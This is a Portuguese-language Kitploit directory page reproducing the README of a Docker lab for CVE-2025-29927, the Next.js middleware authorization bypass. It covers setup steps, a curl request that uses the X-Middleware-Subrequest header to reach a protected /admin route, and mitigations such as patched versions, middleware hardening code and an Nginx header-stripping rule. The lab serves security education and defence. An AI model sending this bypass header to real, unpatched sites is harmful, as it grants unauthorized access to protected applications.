Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
NextJS-CVE-2025-29927-Docker-Lab — Laboratório baseado em Docker para explorar e reproduzir a vulnerabilidade de bypass de autorização de middleware CVE-2025-29927 do Next.js. Inclui aplicativo vulnerável, etapas de reprodução e estratégias de mitigação para pesquisa educacional de segurança. | Kitploit
Ferramentas/GitHubGitHub/enochgitgamefied/nextjs-cve-2025-29927-docker-lab
Autenticação e AutorizaçãoAnálise de VulnerabilidadesExploração de Aplicações WebConfiguração IncorretaAprendizado e EducaçãoLabs e Prática
GitHubenochgitgamefied/nextjs-cve-2025-29927-docker-lab

NextJS-CVE-2025-29927-Docker-Lab

Laboratório baseado em Docker para explorar e reproduzir a vulnerabilidade de bypass de autorização de middleware CVE-2025-29927 do Next.js. Inclui aplicativo vulnerável, etapas de reprodução e estratégias de mitigação para pesquisa educacional de segurança.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
5há 7 mesesAinda não revisado

🚨 NextJS-CVE-2025-29927-Docker-Lab

Este repositório contém um ambiente de laboratório baseado em Docker para explorar e demonstrar a vulnerabilidade CVE-2025-29927 do Next.js em um ambiente controlado.

⚠️ AVISO: Este laboratório é apenas para fins educacionais e de pesquisa em segurança. Não o exponha à internet pública nem o use em produção.


📦 Funcionalidades

  • ✅ Aplicação Next.js vulnerável
  • ✅ Containerizada com Docker
  • ✅ Projetada para testes locais da CVE-2025-29927
  • ✅ Inclui rotas e interface pré-configuradas
  • ✅ Fácil de configurar e executar

🛠 Pré-requisitos

Certifique-se de ter os seguintes itens instalados:

  • Docker (v20+)
  • Git
  • Opcional: Node.js se planeja executar fora do Docker

🚀 Primeiros Passos

Siga estas etapas para clonar e executar o laboratório:

1. Clonar o Repositório

root@kitploit:~
git clone https://github.com/enochgitgamefied/NextJS-CVE-2025-29927-Docker-Lab.git
cd NextJS-CVE-2025-29927-Docker-Lab

2. Construir e Executar com Docker

root@kitploit:~
docker-compose up --build

Isso irá:

  • Construir a imagem Docker
  • Iniciar o servidor Next.js vulnerável
  • Expor a aplicação em http://localhost:3000

📂 Estrutura de Pastas

root@kitploit:~
.
├── app/                     # Código principal da aplicação Next.js
├── public/                  # Ativos estáticos (imagens, etc.)
├── Dockerfile               # Configuração Docker para a aplicação
├── docker-compose.yml       # Configuração do Compose
├── .env                     # Variáveis de ambiente (se houver)
├── README.md                # Você está aqui

🧪 Testando a Vulnerabilidade

🛡️ CVE-2025-29927 - Bypass de Autorização no Middleware do Next.js

⚠️ AVISO: Esta documentação é apenas para fins educacionais e de pesquisa em segurança. Não implante a aplicação vulnerável em um ambiente de produção.


🔍 Visão Geral

CVE-2025-29927 é uma vulnerabilidade crítica de bypass de autorização no middleware do Next.js. Ela permite que atacantes ignorem a autenticação baseada em middleware e acessem rotas protegidas manipulando o cabeçalho X-Middleware-Subrequest.


🧪 Reproduzindo a Vulnerabilidade

1. Acessando Rotas Protegidas Sem Autenticação

Tente acessar uma rota protegida, como /admin, sem qualquer autenticação:

root@kitploit:~
curl http://localhost:3000/admin

Comportamento Esperado: O acesso é negado ou redirecionado para uma página não autorizada.

Comportamento Vulnerável: O acesso é concedido sem autenticação.

2. Bypass do Middleware Usando o Cabeçalho X-Middleware-Subrequest

Envie uma requisição com o cabeçalho X-Middleware-Subrequest para ignorar as verificações do middleware:

root@kitploit:~
curl -H "X-Middleware-Subrequest: src/middleware:nowaf" http://localhost:3000/admin

Resultado: O middleware é ignorado e o acesso à rota protegida é concedido.


🛡️ Estratégias de Mitigação

1. Atualizar o Next.js para uma Versão Corrigida

Atualize o Next.js para uma das seguintes versões onde a vulnerabilidade foi corrigida:

  • 14.2.25
  • 15.2.3
root@kitploit:~
npm install next@latest

2. Implementar Hardening no Middleware

Aprimore seu middleware para validar requisições corretamente e rejeitar qualquer uma com cabeçalhos suspeitos:

root@kitploit:~
import { NextResponse } from 'next/server';

export function middleware(request) {
  const subrequestHeader = request.headers.get('x-middleware-subrequest');
  if (subrequestHeader) {
    return new NextResponse('Unauthorized', { status: 401 });
  }
  // Continue com o processamento normal
  return NextResponse.next();
}

3. Configurar Proxy Reverso para Remover Cabeçalhos Suspeitos

Se você estiver usando um proxy reverso (ex.: Nginx), configure-o para remover o cabeçalho X-Middleware-Subrequest das requisições recebidas:

root@kitploit:~
location / {
  proxy_pass http://localhost:3000;
  proxy_set_header X-Middleware-Subrequest "";
}

📚 Referências

  • NVD - CVE-2025-29927
  • Análise do Datadog Security Labs
  • Postmortem da Vercel

Este arquivo VULNERABILITY.md fornece um guia abrangente para entender e reproduzir a vulnerabilidade CVE-2025-29927 em um ambiente controlado. Ele também oferece estratégias práticas de mitigação para proteger suas aplicações Next.js contra tais explorações.

Para uma demonstração detalhada e mais informações sobre esta vulnerabilidade, você pode consultar a demonstração completa do ataque fornecida por Techtalkpine na postagem do blog, que também está vinculada à demonstração ao vivo no YouTube: https://techtalkpine.com/2025/03/demo-for-cve-2025-29927-nextjs/

Deixe-me saber se precisar de ajuda com alguma parte específica desta configuração ou de mais esclarecimentos sobre as etapas de mitigação.


🧹 Encerramento

Para parar e remover os contêineres:

root@kitploit:~
docker-compose down

📚 Recursos

  • Documentação do Next.js
  • Documentação do Docker
  • OWASP Top 10

⚠️ Aviso Legal

Este projeto é destinado exclusivamente para fins educacionais e de pesquisa. Você é responsável por usá-lo de acordo com todas as leis e diretrizes éticas aplicáveis. O autor não se responsabiliza por qualquer uso indevido ou dano causado.

Baixar ferramenta